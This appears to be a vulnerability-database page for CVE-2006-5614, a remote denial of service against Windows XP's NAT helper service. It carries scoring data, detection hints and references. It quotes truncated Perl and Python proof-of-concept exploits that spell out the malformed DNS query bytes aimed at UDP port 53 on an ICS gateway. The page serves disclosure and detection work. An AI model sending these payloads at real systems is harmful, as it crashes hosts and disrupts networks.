CVE-2006-5614
published 2006-10-31CVE-2006-5614: Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a…
PriorityP423low2.6CVSS 2.0
AVNACHAuNCNINAP
EXPLOIT
EPSS
79.09%
99.5th percentile
Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference.
Detection & IOCsextracted from sources · hover to see the quote
- →Malformed DNS query with all-zero counts (Questions=0, Answer RRs=0, Authority RRs=0, Additional RRs=0) but with a trailing query body triggers the null pointer dereference in ipnathlp.dll. Detect UDP/53 packets with this header pattern directed at ICS-enabled hosts. ↗
- →The exploit targets port 53 UDP on the ICS gateway (NAT helper). Anomalous DNS traffic to internal ICS gateway IPs with malformed zero-count headers should be flagged. ↗
- ·The vulnerability is only exploitable when Internet Connection Sharing (ICS) is enabled on the target Windows XP SP2 host. Systems without ICS enabled are not affected. ↗
- ·The attacker must be on the same local network segment as the ICS gateway (LAN-side), as the exploit targets the internal NAT interface IP (e.g., 192.168.0.1), not a public-facing address. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - NAT Helper Components Remote Denial of Service
exploitdb·2006-10-30
CVE-2006-5614 Microsoft Windows - NAT Helper Components Remote Denial of Service
Microsoft Windows - NAT Helper Components Remote Denial of Service
---
#!/usr/bin/perl
##
## Microsoft Windows NAT Helper Components Remote DoS Exploit (2)
## **************************************************************
##
## .details
## --------
## Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
##
## .info
## -----
## code by x82
## bug by h07
##
## .greetz
## -------
## ... goes out to triple6, wolf, lux2, EaTh, darkkilla, 2letterman .. ;)
##
##
use warnings;
use diagnostics;
use strict;
use IO::Socket;
my $host = $ARGV[0]; # 192.168.0.1
my $port = 53; # standard port
my $payload =
# by h07
"\x6c\xb6".
"\x01\x00".
"\x00\x00".
"\x00\x00".
"\x00\x00".
"\x00\x00". # \n";
print "bug discovered by h07 \n";
print "------------------------------------------------
Exploit-DB
Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service
exploitdb·2006-10-28
CVE-2006-5614 Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service
Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service
---
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##
from socket import *
from time import sleep
host = "192.168.0.1"
port = 53
buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06
Metasploit
Microsoft Windows NAT Helper Denial of Service
metasploit
Microsoft Windows NAT Helper Denial of Service
Microsoft Windows NAT Helper Denial of Service
This module exploits a denial of service vulnerability within the Internet Connection Sharing service in Windows XP.
No writeups or analysis indexed.
http://research.eeye.com/html/alerts/zeroday/20061028.htmlhttp://secunia.com/advisories/22592http://securitytracker.com/id?1017133http://www.osvdb.org/30096http://www.securityfocus.com/bid/20804http://www.vupen.com/english/advisories/2006/4248https://exchange.xforce.ibmcloud.com/vulnerabilities/29917https://www.exploit-db.com/exploits/2672http://research.eeye.com/html/alerts/zeroday/20061028.htmlhttp://secunia.com/advisories/22592http://securitytracker.com/id?1017133http://www.osvdb.org/30096http://www.securityfocus.com/bid/20804http://www.vupen.com/english/advisories/2006/4248https://exchange.xforce.ibmcloud.com/vulnerabilities/29917https://www.exploit-db.com/exploits/2672
2006-10-31
Published